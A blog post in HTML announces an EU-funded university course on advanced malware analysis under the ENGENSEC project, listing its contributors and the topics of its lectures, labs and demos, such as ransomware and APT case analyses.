I'm happy to announce the new <b>Advanced Malware Analysis </b>course I've been working on for eight years is coming out soon as a part of the EU academic project <a href="http://engensec.eu/about-the-project/">ENGENSEC</a> financed by the European Commission. In light of the recent nation-state cyber attacks, I'm glad to be involved in educating the next generation of cybersecurity experts able to counteract cyber attacks at any level.<br />
The course will be adopted by universities in Ukraine, Sweden, Poland, and other partners. It will include theoretical and practical classes on the latest types of cyber attacks, analysis, detection, and prevention technologies totaling 270 hours (7.5 ECTS). You can find the course content below.<br />
<br />
The course will be presented during the <a href="http://engensec.eu/it-summer/">Summer School</a> for students and Train the Trainer workshop for teachers this summer in <a href="http://www.lp.edu.ua/en">Lviv Polytechnic National University</a>.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio_U9o_r6HVyeCANEq303r9qDT6kojBEjZyG6W_I_ou6s5dMALBypi_UnzNg-o-z-Lo95DD7kdx5UXBE0mC3mejysMpK2GXXW9b9mKyo0gG1BOU-7DBTCgC0R5LYKxU_Bbgo7XPXkNBJGu/s1600/Engensec_Malware_Dev.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio_U9o_r6HVyeCANEq303r9qDT6kojBEjZyG6W_I_ou6s5dMALBypi_UnzNg-o-z-Lo95DD7kdx5UXBE0mC3mejysMpK2GXXW9b9mKyo0gG1BOU-7DBTCgC0R5LYKxU_Bbgo7XPXkNBJGu/s200/Engensec_Malware_Dev.jpg" width="200" /></a><br />
Finally, I'd like to thank everyone who has contributed to this course, namely:<br />
<div>
<ul>
<li>Anders Carlsson, BTH</li>
<li>Dragos Ilie, BTH</li>
<li>Dmitriy Komashinskiy, F-Secure</li>
<li>Vladimir Obrizan, <a href="http://dnt-lab.com/">Design and Test Lab</a></li>
</ul>
<br />
We welcome security and academic organizations to join the reviewing process.<br />
<div>
Our contacts:</div>
</div>
<ul>
<li>anders.carlsson (at) bth.se - the general manager of the ENGENSEC project</li>
<li>oleksandr.adamov (at) nure.ua - the Malware Analysis course manager of the ENGENSEC project</li>
</ul>
<div>
<b>Malware Analysis course content</b></div>
<div>
<b><br /></b></div>
<div>
<div>
Lectures:</div>
<div>
<ol>
<li>History of computer threats</li>
<li>Classification of computer threats</li>
<li>Attack techniques and infection vectors</li>
<li>Disassembly</li>
<li>Phishing</li>
<li>Online banking threats</li>
<li>Ransomware: cryptolockers</li>
<li>Botnets</li>
<li>Mobile threats in iOS</li>
<li>Mobile threats in Android</li>
<li>Social networking threats</li>
<li>Vulnerabilities and exploits</li>
<li>Drive-by attacks</li>
<li>Rootkits/bootkits</li>
<li>Targeted attacks and industrial malware</li>
<li>Incident response</li>
</ol>
</div>
<div>
Labs:</div>
</div>
<div>
<div>
<ol>
<li>Malware Detection and Removal</li>
<li>Malware Static Analysis</li>
<li>Malware Dynamic Analysis</li>
<li>Analysis of Exploits</li>
<li>Reverse Engineering x86/ARM</li>
<li>Advanced Unpacking</li>
<li>Rootkits</li>
<li>Android Malware Analysis</li>
<li>Data Mining with RapidMiner</li>
<li>Data Mining with Maltego</li>
</ol>
</div>
</div>
<div>
Practice:</div>
<div>
<div>
<ol>
<li>Analysis of host-based attributes for phishing URLs</li>
<li>x86 Disassembly: Typical C Constructs</li>
<li>x86 Disassembly: Analysis of decryption (deobfuscation) routine used by malware</li>
</ol>
</div>
</div>
<div>
Demos:</div>
<div>
<ol>
<li>Analysis of CozyDuke APT</li>
<li>Static Analysis PE</li>
<li>x86 ASM and Debugging</li>
<li>Exploits: Stack Overrun</li>
<li>Debugging Android CrackMe</li>
<li>Analysis of spear phishing attacks</li>
<li>Analysis of TeslaCrypt ransomware</li>
<li>Analysis of XData ransomware</li>
<li>Analysis of NotPetya cyber attack</li>
</ol>
<div>
Other <a href="http://engensec.eu/course-modules/">ENGENSEC courses</a>:</div>
</div>
<div>
<div>
<ul>
<li>Advanced Network and Cloud Security</li>
<li>Wireless and Mobile Security</li>
<li>Secure Software Development</li>
<li>Web Security</li>
<li>Pentest and Ethical Hacking</li>
<li>Digital Forensics</li>
</ul>
</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0